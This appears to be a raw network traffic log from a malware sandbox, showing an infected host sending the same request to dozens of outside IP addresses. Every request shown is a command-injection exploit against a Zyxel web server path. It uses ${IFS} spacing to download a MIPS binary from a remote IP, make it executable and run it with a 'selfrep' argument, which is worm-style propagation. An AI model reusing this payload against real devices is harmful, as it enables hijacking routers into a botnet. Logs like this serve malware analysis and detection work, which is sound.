                                                Jan 12, 2024 18:16:32.670960903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6710192.168.2.235780257.185.96.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.671021938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6711192.168.2.235873474.126.161.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.671052933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6712192.168.2.234739848.253.235.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.671118021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6713192.168.2.2344154114.175.250.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.671156883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6714192.168.2.234286687.227.117.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.671236992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6715192.168.2.235751623.9.200.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.671282053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6716192.168.2.2359886167.70.170.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.671354055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6717192.168.2.234844071.190.140.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.671415091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6718192.168.2.235532899.220.90.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.671468019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6719192.168.2.2345236202.145.252.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.671519041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6720192.168.2.2339884178.103.99.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.671551943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6721192.168.2.2353738202.81.100.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.671582937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6722192.168.2.2341938155.219.196.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.671653032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6723192.168.2.2349368131.4.37.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.671717882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6724192.168.2.234932243.254.100.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.671797991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6725192.168.2.2352646110.20.189.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.671855927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6726192.168.2.234921217.87.79.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.671900988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6727192.168.2.2345982197.88.244.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.671945095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6728192.168.2.2347334164.46.14.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.671996117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6729192.168.2.23360748.177.73.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.672046900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6730192.168.2.2353326219.68.141.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.672096968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6731192.168.2.2349602136.134.155.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.672144890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6732192.168.2.235719880.45.221.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.672216892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6733192.168.2.233971654.53.235.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.672293901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6734192.168.2.2335070179.248.160.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.672326088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6735192.168.2.2341826211.213.235.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.672385931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6736192.168.2.23355929.106.249.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.672440052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6737192.168.2.234410278.117.68.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.672475100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6738192.168.2.235302698.149.83.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.672554016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6739192.168.2.2345656161.100.212.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.672597885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6740192.168.2.2355768161.30.173.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.672651052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6741192.168.2.2354034104.165.102.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.672734976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6742192.168.2.2333002173.100.245.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.672765017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6743192.168.2.234436820.119.28.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.672806025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6744192.168.2.2355806182.90.30.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.672859907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6745192.168.2.23499342.152.232.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.672941923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6746192.168.2.2345280156.169.111.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.672971964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6747192.168.2.235787051.41.228.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.673042059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6748192.168.2.234047076.97.65.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.673084021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6749192.168.2.2343574185.225.172.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.673150063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6750192.168.2.2358346121.3.200.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.673198938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6751192.168.2.2359198153.224.101.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.673235893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6752192.168.2.2360218133.210.40.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.673326969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6753192.168.2.2349698100.192.218.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.673407078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6754192.168.2.233598035.174.85.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.673470974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6755192.168.2.2335014100.182.210.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.673527956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6756192.168.2.235673443.183.40.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.673607111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6757192.168.2.2342756150.202.161.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.673650026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6758192.168.2.2357082105.23.43.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.673712015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6759192.168.2.2342538107.1.182.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.673773050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6760192.168.2.2354492123.9.222.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.673836946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6761192.168.2.2352062168.229.115.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.673867941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6762192.168.2.234023063.108.23.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.673938036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6763192.168.2.233837245.111.247.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.674000978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6764192.168.2.2336256218.255.100.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.674072027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6765192.168.2.2336490175.200.200.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.674134016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6766192.168.2.233371080.69.55.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.674189091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6767192.168.2.233346048.46.238.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.674253941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6768192.168.2.2338356126.64.82.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.674309969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6769192.168.2.2360634132.252.45.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.674366951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6770192.168.2.233654024.179.117.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.674427986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6771192.168.2.2340366167.194.178.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.674478054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6772192.168.2.23495029.123.164.221443
                                                TimestampBytes transferredDirectionData
